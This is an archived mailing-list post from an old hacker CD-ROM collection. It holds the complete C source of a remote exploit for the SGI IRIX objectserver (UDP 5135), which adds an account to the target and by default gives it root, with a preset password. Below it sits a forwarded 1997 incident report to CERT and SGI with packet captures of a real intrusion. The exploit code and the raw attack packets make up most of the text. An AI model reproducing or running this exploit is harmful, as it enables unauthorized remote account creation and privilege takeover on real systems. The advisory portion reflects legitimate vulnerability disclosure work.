H4CK3R 4

home *** CD-ROM | disk | FTP | other *** search

/ H4CK3R 4 / hacker04 / 04_HACK04.ISO / xploits / irix_obj / irix-objectserver.c

Wrap

C/C++ Source or Header | 2002-03-18 | 19.3 KB | 557 lines

At 08:52 AM 3/29/2000 -0500, Howard wrote: >Since the patches are now officially released, I feel I can finally >release the details of the SGI objectserver vulnerability. This >vulnerability was initailly reported to CERT and SGI Security on >October 6, 1997. A beta version of patch 2849 was provided in >February 1998. > Hi. As a legitimate function of my work I routinely archive and catalog vulnerability information and exploit code. In the interest of full-disclosure and in possibly helping system administrators evaluate the security of their SGI boxen, I am attaching the remote exploit for Irix objectserver (udp 5135). There are big problems with the US government right now - if you are doing security work (let alone cracking!) be advised that things are getting seriously fucked. See the "L0phtcrack as a burglary tool" article? See all these kids getting PRISON sentences for typing? The government isn't playing by sane rules. Be prepared. Be awake! Marcy /* Copyright (c) July 1997 Last Stage of Delirium */ /* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF */ /* Last Stage of Delirium */ /* */ /* The contents of this file may be disclosed to third */ /* parties, copied and duplicated in any form, in whole */ /* or in part, without the prior written consent of LSD. */ /* SGI objectserver "account" exploit */ /* Remotely adds account to the IRIX system. */ /* Tested on IRIX 5.2, 5.3, 6.0.1, 6.1 and even 6.2, */ /* which was supposed to be free from this bug (SGI 19960101-01-PX). */ /* The vulnerability "was corrected" on 6.2 systems but */ /* SGI guys fucked up the job and it still can be exploited. */ /* The same considers patched 5.x,6.0.1 and 6.1 systems */ /* where SGI released patches DONT work. */ /* The only difference is that root account creation is blocked. */ /* */ /* usage: ob_account ipaddr [-u username] [-i userid] [-p] */ /* -i specify userid (other than 0) */ /* -u change the default added username */ /* -p probe if there's the objectserver running */ /* */ /* default account added : lsd */ /* default password : m4c10r4! */ /* default user home directory : /tmp/.new */ /* default userid : 0 */ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <sys/uio.h> #include <errno.h> #include <stdio.h> #define E if(errno) perror(""); struct iovec iov[2]; struct msghdr msg; char buf1[1024],buf2[1024]; int sck; unsigned long adr; void show_msg(){ char *p,*p1; int i,j,c,d; c=0; printf("%04x ",iov[0].iov_len); p=(char*)iov[0].iov_base; for(i=0;i<iov[0].iov_len;i++){ c++; if(c==17){ printf(" "); p1=p;p1=p1-16; for(j=0;j<16;j++){ if(isprint(*p1)) printf("%c",*p1); else printf("."); p1++; } c=1; printf("\n "); } printf("%02x ",(unsigned char)*p++); } printf(" "); p1=p;p1=p1-c; if(c>1){ for(i=0;i<(16-c);i++) printf(" "); for(i=0;i<c;i++){ if(isprint(*p1)) printf("%c",*p1); else printf("."); p1++; } } printf("\n"); if(msg.msg_iovlen!=2) return; c=0; p=(char*)iov[0].iov_base; d=p[0x0a]*0x100+p[0x0b]; p=(char*)iov[1].iov_base; printf("%04x ",d); for(i=0;i<d;i++){ c++; if(c==17){ printf(" "); p1=p;p1=p1-16; for(j=0;j<16;j++){ if(isprint(*p1)) printf("%c",*p1); else printf("."); p1++; } c=1; printf("\n "); } printf("%02x ",(unsigned char)*p++); } printf(" "); p1=p;p1=p1-c; if(c>1){ for(i=0;i<(16-c);i++) printf(" "); for(i=0;i<c;i++){ if(isprint(*p1)) printf("%c",*p1); else printf("."); p1++; } } printf("\n"); fflush(stdout); } char numer_one[0x10]={ 0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00, 0x00,0x00,0x00,0x24,0x00,0x00,0x00,0x00 }; char numer_two[0x24]={ 0x21,0x03,0x00,0x43,0x00,0x0a,0x00,0x0a, 0x01,0x01,0x3b,0x01,0x6e,0x00,0x00,0x80, 0x43,0x01,0x01,0x18,0x0b,0x01,0x01,0x3b, 0x01,0x6e,0x01,0x02,0x01,0x03,0x00,0x01, 0x01,0x07,0x01,0x01 }; char dodaj_one[0x10]={ 0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00, 0x00,0x00,0x01,0x2a,0x00,0x00,0x00,0x00 }; char dodaj_two[1024]={ 0x1c,0x03,0x00,0x43,0x02,0x01,0x1d,0x0a, 0x01,0x01,0x3b,0x01,0x78 }; char dodaj_three[27]={ 0x01,0x02,0x0a,0x01,0x01,0x3b, 0x01,0x78,0x00,0x00,0x80,0x43,0x01,0x10, 0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01, 0x01,0x01,0x09,0x43,0x01 }; char dodaj_four[200]={ 0x17,0x0b,0x01,0x01,0x3b,0x01,0x02, 0x01,0x01,0x01,0x09,0x43,0x01,0x03,0x4c, 0x73,0x44,0x17,0x0b,0x01,0x01,0x3b,0x01, 0x6e,0x01,0x06,0x01,0x09,0x43,0x00,0x17, 0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,0x07, 0x01,0x09,0x43,0x00,0x17,0x0b,0x01,0x01, 0x3b,0x01,0x02,0x01,0x03,0x01,0x09,0x43, 0x00,0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e, 0x01,0x09,0x01,0x09,0x43,0x00,0x17,0x0b, 0x01,0x01,0x3b,0x01,0x6e,0x01,0x0d,0x01, 0x09,0x43,0x00,0x17,0x0b,0x01,0x01,0x3b, 0x01,0x6e,0x01,0x10,0x01,0x09,0x43,0x00, 0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01, 0x0a,0x01,0x09,0x43,0x00,0x17,0x0b,0x01, 0x01,0x3b,0x01,0x6e,0x01,0x0e,0x01,0x03, 0x01,0x09,0x17,0x0b,0x01,0x01,0x3b,0x01, 0x6e,0x01,0x04,0x01,0x09,0x43,0x01,0x0d, 0x61,0x6b,0x46,0x4a,0x64,0x78,0x65,0x6e, 0x4b,0x6e,0x79,0x53,0x2e,0x17,0x0b,0x01, 0x01,0x3b,0x01,0x6e,0x01,0x11,0x01,0x09, 0x43,0x01,0x09,0x2f,0x74,0x6d,0x70,0x2f, 0x2e,0x6e,0x65,0x77,0x17,0x0b,0x01,0x01, 0x3b,0x01,0x6e,0x01,0x12,0x01,0x09,0x43, 0x01,0x04,0x72,0x6f,0x6f,0x74,0x17,0x0b, 0x01,0x01,0x3b,0x01,0x6e,0x01,0x02,0x01, 0x03 }; char dodaj_five[39]={ 0x17,0x0b,0x01,0x01,0x3b,0x01, 0x6e,0x01,0x13,0x01,0x09,0x43,0x01,0x08, 0x2f,0x62,0x69,0x6e,0x2f,0x63,0x73,0x68, 0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01, 0x0f,0x01,0x09,0x43,0x01,0x03,'L','S','D' }; char fake_adrs[0x10]={ 0x00,0x02,0x14,0x0f,0xff,0xff,0xff,0xff, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; char *get_sysinfo(){ int i=0,j,len; iov[0].iov_base=numer_one; iov[0].iov_len=0x10; iov[1].iov_base=numer_two; iov[1].iov_len=0x24; msg.msg_name=(caddr_t)fake_adrs; msg.msg_namelen=0x10; msg.msg_iov=iov; msg.msg_iovlen=2; msg.msg_accrights=(caddr_t)0; msg.msg_accrightslen=0; printf("SM: --[0x%04x bytes]--\n",sendmsg(sck,&msg,0)); show_msg(); printf("\n"); iov[0].iov_base=buf1; iov[1].iov_base=buf2; iov[1].iov_len=0x200; msg.msg_iovlen=2; printf("RM: --[0x%04x bytes]--\n",len=recvmsg(sck,&msg,0)); show_msg(); printf("\n"); while(i<len-0x16) if(!memcmp("\x0a\x01\x01\x3b\x01\x78",&buf2[i],6)){ printf("remote system ID: "); for(j=0;j<buf2[i+6];j++) printf("%02x ",buf2[i+7+j]); printf("\n"); return(&buf2[i+6]); }else i++; return(0); } void new_account(int len){ iov[0].iov_base=dodaj_one; iov[0].iov_len=0x10; iov[1].iov_base=dodaj_two; iov[1].iov_len=len; msg.msg_name=(caddr_t)fake_adrs; msg.msg_namelen=0x10; msg.msg_iov=iov; msg.msg_iovlen=2; msg.msg_accrights=(caddr_t)0; msg.msg_accrightslen=0; printf("SM: --[0x%04x bytes]--\n",sendmsg(sck,&msg,0)); show_msg(); printf("\n"); iov[0].iov_base=buf1; iov[1].iov_base=buf2; iov[1].iov_len=0x200; msg.msg_iovlen=2; printf("RM: --[0x%04x bytes]--\n",recvmsg(sck,&msg,0)); show_msg(); printf("\n"); } void info(char *text){ printf("SGI objectserver \"account\" exploit by LSD\n"); printf("usage: %s ipaddr [-u username] [-i userid] [-p]\n",text); } main(int argc,char **argv){ int c,user,version,probe; unsigned int offset,gr_offset,userid; char *sys_info; char username[20]; extern char *optarg; extern int optind; if(argc<2) {info(argv[0]);exit(0);} optind=2; offset=40; user=version=probe=0; while((c=getopt(argc,argv,"u:i:p"))!=-1) switch(c){ case 'u': strcpy(username,optarg); user=1; break; case 'i': version=62; userid=atoi(optarg); break; case 'p': probe=1; break; case '?': default : info(argv[0]); exit(1); } sck=socket(AF_INET,SOCK_DGRAM,0); adr=inet_addr(argv[1]); memcpy(&fake_adrs[4],&adr,4); if(!(sys_info=get_sysinfo())){ printf("error: can't get system ID for %s.\n",argv[1]); exit(1); } if(!probe){ memcpy(&dodaj_two[0x0d],sys_info,sys_info[0]+1); memcpy(&dodaj_two[0x0d+sys_info[0]+1],&dodaj_three[0],27); offset+=sys_info[0]+1; if(!user) strcpy(username,"lsd"); dodaj_two[offset++]=strlen(username); strcpy(&dodaj_two[offset],username);offset+=strlen(username); memcpy(&dodaj_two[offset],&dodaj_four[0],200); offset+=200; gr_offset=offset-15; if(version){ dodaj_two[gr_offset++]='u'; dodaj_two[gr_offset++]='s'; dodaj_two[gr_offset++]='e'; dodaj_two[gr_offset++]='r'; dodaj_two[offset++]=0x02; dodaj_two[offset++]=userid>>8; dodaj_two[offset++]=userid&0xff; } else dodaj_two[offset++]=0x00; memcpy(&dodaj_two[offset],&dodaj_five[0],39); offset+=39; dodaj_one[10]=offset>>8; dodaj_one[11]=offset&0xff; new_account(offset); } } /* end g23 exploit post */ __________________________________________________ Do You Yahoo!? Talk to your friends online with Yahoo! Messenger. http://im.yahoo.com Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM> From: "Howard M. Kash III" <hmkash@ARL.MIL> Subject: Objectserver vulnerability X-To: BUGTRAQ@securityfocus.com Since the patches are now officially released, I feel I can finally release the details of the SGI objectserver vulnerability. This vulnerability was initailly reported to CERT and SGI Security on October 6, 1997. A beta version of patch 2849 was provided in February 1998. Howard ----- Forwarded message # 1: Date: Mon, 6 Oct 97 7:09:51 EDT From: "Howard M. Kash III" To: cert@cert.org, security-alert@sgi.com Subject: URGENT - new SGI vulnerability [Internal error while calling pgp, raw data follows] -----BEGIN PGP SIGNED MESSAGE----- URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT SGI objectserver vulnerabilty allows remote users to create accounts. Yesterday two of our hosts were compromised by an (as far as I could determine) unknown, unpatched bug in SGI's objectserver. The attack consisted of sending UDP packets to port 5135 (see below). The result was a non-root account being added to the system. The two compromised hosts were running IRIX 6.2, but the vulnerability may affect other versions of IRIX. The vulnerability does not appear to give root access directly, as the attackers used other IRIX vulnerabilities to gain root access after logging into the new account. Attached are the UDP packets exchanged between the attacking host (aaa.aaa.aaa.aaa) and the target host (ttt.ttt.ttt.ttt). IP addresses have been masked to protect the guilty - I mean innocent until proven guilty. The result of this sequence of packets is the following line added to /etc/passwd: gueust:x:5002:20:LsD:/tmp/.new:/bin/csh An entry must also be added to /etc/shadow since the attacker then logs into the new account with a password. As a temporary measure we have blocked all traffic to port 5135 at our gateway. Howard Kash U.S. Army Research Lab - ------------------------------------------------------------------------ TCP and UDP headers have been separated out. I've decoded some of the packet contents into its ascii equivalent below the line. 16:52:00.631310 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 52 4500 0050 7d95 0000 2a11 bfb5 aaaa aaaa tttt tttt 112a 140f 003c 6516 0001 0000 0001 0000 0000 0024 0000 0000 2103 0043 000a 000a 0101 3b01 6e00 0080 4301 0118 0b01 013b 016e 0102 0103 0001 0107 0101 16:52:00.638455 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 95 4500 007b 0644 0000 3a11 26dc tttt tttt aaaa aaaa 140f 112a 0067 0d37 0001 0186 0001 0000 0000 004f 0000 0000 2903 0043 000a 0080 4300 8043 0105 0a01 013b 0178 0469 0a79 9a01 330a 0101 3b01 7804 690a 799a 0138 0a01 013b 0178 0469 0a79 9a01 020a 0101 3b01 7804 690a 799a 0103 0a01 013b 0178 0469 0a79 9a01 04 16:52:00.794985 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 312 4500 0154 7da3 0000 2a11 bea3 aaaa aaaa tttt tttt 112a 140f 0140 a1b2 0001 0000 0001 0000 0000 0128 0000 0000 1c03 0043 0201 1d0a 0101 3b01 7804 690a 799a 0102 0a01 013b 0178 0000 8043 0110 170b 0101 3b01 6e01 0101 0943 0106 6775 6575 7374 g u e u s t 170b 0101 3b01 0201 0101 0943 0103 4c73 L s 4417 0b01 013b 016e 0106 0109 4300 170b D 0101 3b01 6e01 0701 0943 0017 0b01 013b 0102 0103 0109 4300 170b 0101 3b01 6e01 0901 0943 0017 0b01 013b 016e 010d 0109 4300 170b 0101 3b01 6e01 1001 0943 0017 0b01 013b 016e 010a 0109 4300 170b 0101 3b01 6e01 0e01 0301 0917 0b01 013b 016e 0104 0109 4301 0d61 6b46 4a64 7865 6e4b 6e79 532e 170b 0101 3b01 6e01 1101 0943 0109 2f74 6d70 2f2e 6e65 7717 0b01 013b / t m p / . n e w 016e 0112 0109 4301 0470 6f6f 7417 0b01 013b 016e 0102 0103 0017 0b01 013b 016e 0113 0109 4301 082f 6269 6e2f 6373 6817 / b i n / c s h 0b01 013b 016e 010f 0109 4301 074c 7344 2f43 5444 16:52:00.921356 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 41 4500 0045 0646 0000 3a11 2710 tttt tttt aaaa aaaa 140f 112a 0031 0ef5 0001 0187 0001 0000 0000 0019 0000 0000 2503 0043 0201 1d0a 0080 4300 0a01 013b 0178 0469 0a79 9a01 39 16:53:33.226155 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 52 4500 0050 8f33 0000 2a11 ae17 aaaa aaaa tttt tttt 112f 140f 003c 6511 0001 0000 0001 0000 0000 0024 0000 0000 2103 0043 000a 000a 0101 3b01 6e00 0080 4301 0118 0b01 013b 016e 0102 0103 0001 0107 0101 16:53:33.232248 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 108 4500 0088 0669 0000 3a11 26aa tttt tttt aaaa aaaa 140f 112f 0074 3f4f 0001 0188 0001 0000 0000 005c 0000 0000 2903 0043 000a 0080 4300 8043 0106 0a01 013b 0178 0469 0a79 9a01 330a 0101 3b01 7804 690a 799a 0138 0a01 013b 0178 0469 0a79 9a01 390a 0101 3b01 7804 690a 799a 0102 0a01 013b 0178 0469 0a79 9a01 030a 0101 3b01 7804 690a 799a 0104 16:53:33.420972 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 314 4500 0156 8f3e 0000 2a11 ad06 aaaa aaaa tttt tttt 112f 140f 0142 1399 0001 0000 0001 0000 0000 012a 0000 0000 1c03 0043 0201 1d0a 0101 3b01 7804 690a 799a 0102 0a01 013b 0178 0000 8043 0110 170b 0101 3b01 6e01 0101 0943 0106 6775 6575 7374 170b 0101 3b01 0201 0101 0943 0103 4c73 4417 0b01 013b 016e 0106 0109 4300 170b 0101 3b01 6e01 0701 0943 0017 0b01 013b 0102 0103 0109 4300 170b 0101 3b01 6e01 0901 0943 0017 0b01 013b 016e 010d 0109 4300 170b 0101 3b01 6e01 1001 0943 0017 0b01 013b 016e 010a 0109 4300 170b 0101 3b01 6e01 0e01 0301 0917 0b01 013b 016e 0104 0109 4301 0d61 6b46 4a64 7865 6e4b 6e79 532e 170b 0101 3b01 6e01 1101 0943 0109 2f74 6d70 2f2e 6e65 7717 0b01 013b 016e 0112 0109 4301 0475 7365 7217 0b01 013b 016e 0102 0103 0213 8a17 0b01 013b 016e 0113 0109 4301 082f 6269 6e2f 6373 6817 0b01 013b 016e 010f 0109 4301 074c 7344 2f43 5444 16:53:33.580619 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 41 4500 0045 0671 0000 3a11 26e5 tttt tttt aaaa aaaa 140f 112f 0031 0dee 0001 0189 0001 0000 0000 0019 0000 0000 2503 0043 0201 1d0a 0080 4300 0a01 013b 0178 0469 0a79 9a01 3a -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBNDjGrKDxPoYWV34tAQGVJwQA0OHHlupV1LDF6bFcnWuNfnancEmSs8ee nF1LRhJrxnniPYI05xZ6aR5OIgtwVFtlAxDdWsgKxuuu3k/CTnSMA3ObsTG1GW1w I7AXwNmKMUGCglVv6evDHXWbwR6uao//8c/Hfi1s09d/jZIiy2zFm4Gnrkw0sGj+ n9jE26XP5HU= =yKsl -----END PGP SIGNATURE----- ----- End of forwarded messages [End of raw data]